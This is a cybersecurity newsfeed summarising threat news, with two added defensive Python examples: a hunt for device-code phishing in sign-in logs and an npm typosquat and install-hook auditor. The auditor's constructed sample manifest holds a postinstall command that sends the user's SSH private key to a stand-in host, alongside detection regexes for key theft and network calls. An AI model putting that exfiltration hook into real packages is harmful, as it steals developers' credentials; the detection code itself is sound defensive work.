Cybersecurity Newsfeed - 06/04/26
Daily cybersecurity news covering vulnerabilities, adversaries, trends, breaches, and other notable security developments.
📅 06/04/26
🛡️ Vulnerabilities
Fortinet FortiClient EMS (CVE-2026-35616): A critical vulnerability in FortiClient Endpoint Management Server (EMS) is under active exploitation. It lets unauthenticated attackers execute arbitrary code by sending crafted packets to the server. Fortinet has released patches for the 7.0 and 7.2 branches; apply them, and limit the server's network exposure in the meantime.
React2Shell Automated Exploitation: Attackers are using the "React2Shell" exploit in an automated campaign against web applications that expose environment files (such as .env) or run with debug mode misconfigured. Successful hits receive a web shell, which is then used to harvest API keys and database passwords.
TrueConf Zero-Day in Asia: A zero-day vulnerability in the TrueConf video conferencing software has been exploited against government entities in Asia. The flaw allows remote code execution and has been used for espionage and document theft.
🎯 Adversaries
Mustang Panda (TA416) Targets Europe: The China-linked group is targeting European government entities with diplomacy-themed phishing lures, deploying updated versions of its PlugX and Hodur malware for persistent surveillance.
Axios Maintainer Hijacked: The maintainer of the "axios" npm package was targeted with a social engineering lure disguised as a fix for a Microsoft Teams error. The attack led to an account takeover, a massive supply chain risk given the millions of downstream applications that depend on the package.
UNC1069 Targets Node.js Developers: Using fake LinkedIn and Slack recruiter profiles, the UNC1069 group is approaching Node.js maintainers to deliver malware and gain access to critical open-source repositories.
TeamPCP Hacker Infighting: A newly emerged group, TeamPCP, focuses on attacking other threat actors to disrupt their operations and steal their tooling, creating a volatile "hacker vs. hacker" ecosystem.
📈 Trends
37-Fold Surge in Device Code Phishing: New phishing kits that abuse the OAuth 2.0 device authorization flow are spreading. The lure sends the victim to the legitimate Microsoft login page to enter a short user code that the attacker generated, so no malicious domain is involved and traditional URL and reputation filters see nothing to block; the resulting tokens are issued to the attacker's session, giving persistent access to the victim's cloud accounts.
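Because the phishing page is Microsoft's own, the signal lives in the identity provider's sign-in telemetry rather than in web traffic. The following is an added example (not code from the article or from Microsoft) of a hunt over sign-in records shaped like Microsoft Entra sign-in logs, where the authenticationProtocol field carries the value "deviceCode" for this flow. The per-user country baseline, the list of apps expected to use the flow and every sample record are constructed for the demo.

```python
"""Hunt for OAuth 2.0 device-code sign-ins in Entra ID style sign-in logs.

Added example for this newsfeed item; it is not code from the article or from
any vendor. The record layout follows Microsoft Entra sign-in logs, where the
authenticationProtocol field takes the value "deviceCode" for this flow; the
baseline, the expected-app list and every record below are constructed.
"""
import json

# Constructed newline-delimited JSON: an ordinary interactive sign-in, a
# device-code sign-in from a country the user has never used (the phishing
# pattern), a routine CLI device-code login, and a failed device-code attempt.
SAMPLE_LOG = r"""
{"createdDateTime":"2026-04-06T08:02:11Z","userPrincipalName":"alice@example.com","authenticationProtocol":"none","ipAddress":"203.0.113.10","location":{"countryOrRegion":"DE"},"appDisplayName":"Microsoft Teams","status":{"errorCode":0}}
{"createdDateTime":"2026-04-06T08:15:40Z","userPrincipalName":"alice@example.com","authenticationProtocol":"deviceCode","ipAddress":"198.51.100.77","location":{"countryOrRegion":"NG"},"appDisplayName":"Microsoft Office","status":{"errorCode":0}}
{"createdDateTime":"2026-04-06T09:01:03Z","userPrincipalName":"bob@example.com","authenticationProtocol":"deviceCode","ipAddress":"203.0.113.22","location":{"countryOrRegion":"DE"},"appDisplayName":"Azure CLI","status":{"errorCode":0}}
{"createdDateTime":"2026-04-06T09:30:00Z","userPrincipalName":"bob@example.com","authenticationProtocol":"deviceCode","ipAddress":"203.0.113.22","location":{"countryOrRegion":"DE"},"appDisplayName":"Azure CLI","status":{"errorCode":50126}}
"""

# Countries each user normally signs in from; in production derive this from
# 30+ days of sign-in history. Constructed for the demo.
BASELINE_COUNTRIES = {"alice@example.com": {"DE"}, "bob@example.com": {"DE"}}

# Applications this tenant legitimately expects to use the device code flow
# (headless CLIs and similar). Assumed allowlist; tune to your environment.
EXPECTED_DEVICE_CODE_APPS = {"Azure CLI", "Azure PowerShell"}


def parse_signins(text):
    """Parse newline-delimited JSON sign-in records into dicts."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def device_code_alerts(records, baseline, expected_apps=EXPECTED_DEVICE_CODE_APPS):
    """Return one alert per successful device-code sign-in, scored by how unusual it is.

    Severity: high   = unfamiliar country AND an app not expected to use the flow
              medium = one of the two
              low    = routine device-code login (kept for audit)
    """
    alerts = []
    for rec in records:
        if rec.get("authenticationProtocol") != "deviceCode":
            continue
        # A non-zero errorCode means the sign-in did not succeed, so no token was issued.
        if rec.get("status", {}).get("errorCode", 0) != 0:
            continue
        user = rec["userPrincipalName"]
        country = rec.get("location", {}).get("countryOrRegion")
        app = rec.get("appDisplayName")
        reasons = []
        if country not in baseline.get(user, set()):
            reasons.append(f"sign-in from {country}, outside baseline {sorted(baseline.get(user, ()))}")
        if app not in expected_apps:
            reasons.append(f"app {app!r} is not expected to use the device code flow")
        severity = {0: "low", 1: "medium", 2: "high"}[len(reasons)]
        alerts.append({
            "time": rec["createdDateTime"], "user": user, "ip": rec.get("ipAddress"),
            "app": app, "severity": severity, "reasons": reasons,
        })
    return alerts


if __name__ == "__main__":
    for alert in device_code_alerts(parse_signins(SAMPLE_LOG), BASELINE_COUNTRIES):
        print(f"[{alert['severity'].upper():6}] {alert['time']} {alert['user']} "
              f"from {alert['ip']} via {alert['app']}")
        for reason in alert["reasons"]:
            print(f"         - {reason}")
```

Run it against an export of the sign-in log; the constructed data produces a high-severity alert for the phished user and a low-severity audit entry for the CLI login. For users who have no business reason to use the device code flow at all, the cleaner control is to block the flow for them in Entra Conditional Access (the "Authentication flows" condition), so a phished user code never yields a token in the first place.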
36 Malicious npm Packages Identified: The surge in supply chain attacks continues, with 36 npm packages found using typosquatting (names a character or two off popular packages) to get installed by mistake and then exfiltrate SSH keys and environment variables from developer machines.
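Two checks catch most of this class of package before it runs: a dependency name that sits a small edit distance from a popular package, and lifecycle scripts that npm executes automatically at install time. The block below is an added example, not code from the article, and it does not describe how the 36 packages in question work; the popular-package list, the regex heuristics and the two sample manifests are constructed.

```python
"""Spot typosquatted npm package names and install-time scripts in a manifest.

Added example for this newsfeed item; it is not code from the article and does
not describe the 36 packages themselves. It applies two generic checks: a
dependency name within a small edit distance of a popular package is a
typosquat candidate, and preinstall/install/postinstall scripts run
automatically during `npm install`, so whatever they do with keys or
environment variables happens on the developer's machine. The popular-package
list, the regex patterns and the sample manifests are all constructed.
"""
import re

# Constructed allowlist; in practice feed this from your lockfiles or npm download stats.
KNOWN_PACKAGES = {"lodash", "express", "axios", "react", "chalk", "commander"}

# Lifecycle scripts npm executes while installing a dependency.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Things an install script has little business doing (constructed heuristics).
SUSPICIOUS = [
    ("reads SSH material", r"\.ssh\b|id_rsa|id_ed25519"),
    ("touches environment variables", r"process\.env|\$\{?[A-Z_]+\}?"),
    ("calls out to the network", r"\b(curl|wget)\b|https?://"),
    ("spawns a shell", r"child_process|execSync|\bsh -c\b"),
]


def levenshtein(a, b):
    """Edit distance with insert, delete and substitute each costing 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name, known=KNOWN_PACKAGES, max_dist=2):
    """Popular package names this name is suspiciously close to (empty if it is one of them)."""
    if name in known:
        return []
    return sorted(k for k in known if levenshtein(name, k) <= max_dist)


def audit_manifest(manifest, known=KNOWN_PACKAGES):
    """Findings for one package.json (as a dict): name similarity plus install hooks."""
    findings = []
    name = manifest.get("name", "")
    for near in typosquat_candidates(name, known):
        findings.append(f"name {name!r} is within 2 edits of popular package {near!r}")
    scripts = manifest.get("scripts", {})
    for hook in INSTALL_HOOKS:
        if hook not in scripts:
            continue
        cmd = scripts[hook]
        findings.append(f"{hook} script runs automatically on install: {cmd}")
        for label, pattern in SUSPICIOUS:
            if re.search(pattern, cmd):
                findings.append(f"{hook} script {label}")
    return findings


def audit_dependencies(dep_names, known=KNOWN_PACKAGES):
    """Map each dependency name from a consumer's package.json to its typosquat candidates."""
    flagged = {}
    for dep in dep_names:
        candidates = typosquat_candidates(dep, known)
        if candidates:
            flagged[dep] = candidates
    return flagged


# Constructed sample manifests: a typosquat with an exfiltrating postinstall hook
# (the collector host uses the reserved .invalid TLD) and a well-behaved package.
TYPOSQUAT_MANIFEST = {
    "name": "lodahs",
    "version": "4.17.21",
    "scripts": {
        "postinstall": "node -e \"require('child_process').execSync("
                       "'curl -s -X POST https://collector.invalid/c -d @$HOME/.ssh/id_rsa')\"",
    },
}
CLEAN_MANIFEST = {"name": "lodash", "version": "4.17.21", "scripts": {"test": "mocha"}}


if __name__ == "__main__":
    for manifest in (TYPOSQUAT_MANIFEST, CLEAN_MANIFEST):
        print(manifest["name"], "->", audit_manifest(manifest) or "no findings")
    print(audit_dependencies(["lodahs", "axios", "reacts"]))
```

Run audit_dependencies over the dependency names in your own package.json and audit_manifest over each package.json under node_modules; installing with `npm install --ignore-scripts` first lets you review the hooks before anything executes.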
LinkedIn Extension Scanning: LinkedIn has been caught probing users' browsers for the presence of more than 6,000 Chrome extensions, raising privacy concerns about telemetry harvested without explicit consent.
Multi-Extortion Ransomware Evolution: Ransomware operators have shifted to multi-extortion, combining encryption with DDoS attacks and direct harassment of the victim's clients to increase pressure to pay.
CrystalX RAT (MaaS): CrystalX RAT, a new Malware-as-a-Service offering, combines spyware and information-stealing capabilities with heavy obfuscation to evade antivirus detection on Windows.
Fake ChatGPT Ad Blocker: A malicious Chrome extension posing as an AI-powered ad blocker has been found spying on users, capturing browsing history and credentials through injected scripts.
Virtual RAM Risks: With RAM prices rising, more systems lean on virtual memory (swap files or pagefiles on disk) to make up the shortfall. Beyond the performance cost, this writes memory pages, which can hold keys, passwords and other secrets, to persistent storage, where they remain recoverable after the owning process has exited unless the swap area is encrypted or wiped. That widens the footprint of sensitive data and complicates both privacy and forensic handling of the disk.
💥 Breaches & Leaks
Mercor AI 4TB Data Breach: AI recruiting firm Mercor suffered a massive breach, roughly 4TB of data exposed through an unsecured database, including resumes, government ID documents and interview videos of thousands of job seekers.
Qilin Ransomware Hits Die Linke: The German political party Die Linke confirmed a data breach following a Qilin ransomware attack; sensitive documents were exfiltrated during a critical political period.
Hims & Hers via Zendesk: Telehealth provider Hims & Hers warned customers of a breach after attackers gained access to Zendesk support tickets containing descriptions of personal health issues.
Source Code Leak Epidemic: A run of high-profile source code leaks points to weak supply chain oversight: proprietary algorithms and hardcoded credentials are being exposed through misconfigured cloud storage.
📚 Others
Microsoft Exchange Online Outages: Persistent configuration errors have left users unable to sync mailboxes, underlining the risk of depending entirely on centralized cloud infrastructure.
Insider Extortion Plot: A former employee admitted to locking thousands of his former employer's Windows devices after being terminated, a reminder that accounts and access must be revoked at the moment of offboarding, not afterwards.
